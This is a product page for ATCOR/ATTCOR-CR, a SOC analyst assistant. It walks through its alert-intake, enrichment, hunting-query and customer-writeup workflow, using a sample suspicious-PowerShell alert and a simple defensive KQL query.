WORKING TOOL / SOC ASSISTANT / ATTCOR-CR

ATCOR analyst workflow preview

ATCOR / ATTCOR-CR is a SOC analyst assistant designed to reduce repetitive alert handling and turn raw investigation context into clearer customer updates, stronger hunting pivots, and consistent analyst output.

View workflow screens Open ATCOR repo

$ atcor --intake suspicious-powershell

[ioc] host=HOST-01 user=jsmith process=powershell.exe

[triage] ATT&CK context loaded for analyst review

[output] writeup.md queries.md case-note.txt ready

WHAT IT DOES

From alert intake to customer-ready output

The tool supports analysts through the high-friction parts of repeat alert handling: extracting indicators, shaping the investigation narrative, generating query packs, checking evidence quality, and exporting copy-ready outputs for tickets, portals, or email.

Intake

Paste raw alert context and normalize the useful case facts.

Enrich

Review extracted IOCs, ATT&CK/STIX context, and triage hints.

Hunt

Generate query packs for tools like Sentinel, Splunk, Elastic, Defender XDR, CrowdStrike, and more.

Handoff

Export customer-ready writeups, case notes, and query bundles in analyst-friendly formats.

REAL APP LOOK

ATTCOR-CR - SOC Assistant

Analyst-ready writeups, full ATT&CK/STIX lookups, platform hunting queries, and remediation guidance.

UTC WATCH 21:04:43 Tue, 07 Apr 2026 21:04:43

UTC clock / time zone comparison

Compare UTC against location United Kingdom / London

Use this to compare the alert time with the user's or host's local location.

Current time

UTC: 2026-04-07 21:04:32

Europe/London: 2026-04-07 22:04:32 BST

1. Intake

Paste the alert, choose a case template if useful, and confirm the core fields before generating output.

Alert type template Downloaded from the internet Applied template: None

2. Parse and enrich

Title / detection description Suspicious PowerShell execution detected on HOST-01 Mitigation status Under investigation

Host HOST-01 User jsmith File/Process powershell.exe

Raw alert (paste JSON, text, or log excerpt) AlertName=Suspicious PowerShell; Host=HOST-01; User=jsmith; Process=powershell.exe; Status=Under investigation Internal TI summary (optional) ATT&CK context and reputation notes appear here after enrichment. External reputation summary (optional) Awaiting analyst validation before customer handoff.

CLICKABLE PREVIEW

Generate a SOC case preview

Choose a scenario and let the interactive preview populate the intake, triage, query, evidence, and customer writeup panels. This is a safe website preview of the workflow, not the full private ATTCOR-CR app engine.

Alert scenario Investigation outcome Query platform Customer profile

Visitor preview limit: 3 generated outputs available.

WORKFLOW SCREENS

Relevant ATCOR workflow views

Alert Intake STEP 01

Suspicious PowerShell execution detected on HOST-01

Host HOST-01

User jsmith

Process powershell.exe

Evidence Quality STEP 02

Timestamp present
Host and user context captured
Hash and reputation pending
Sandbox context recommended

Hunting Queries STEP 03

DeviceProcessEvents
| where DeviceName =~ "HOST-01"
| where ProcessCommandLine has "powershell"

Sentinel Splunk Elastic Defender XDR

Customer Writeup STEP 04

Hello,

We observed suspicious PowerShell execution and reviewed the available endpoint evidence.

Recommended next steps: validate user activity, review command-line context, and confirm whether the execution was expected.

.docx .md .txt

ACCESS AND BUILD

Built for local analyst use

ATTCOR-CR is designed to run locally once installed, with configurable defaults for theme, timezone, selected platforms, and ATT&CK display preferences. It supports analyst judgement rather than replacing it: generated outputs should always be reviewed before being actioned.

Core capabilities

Customer-ready writeups, multi-platform hunting query bundles, ATT&CK-assisted triage, IOC extraction, remediation playbooks, evidence-quality scoring, and exports for handoff.

Open ATCOR repository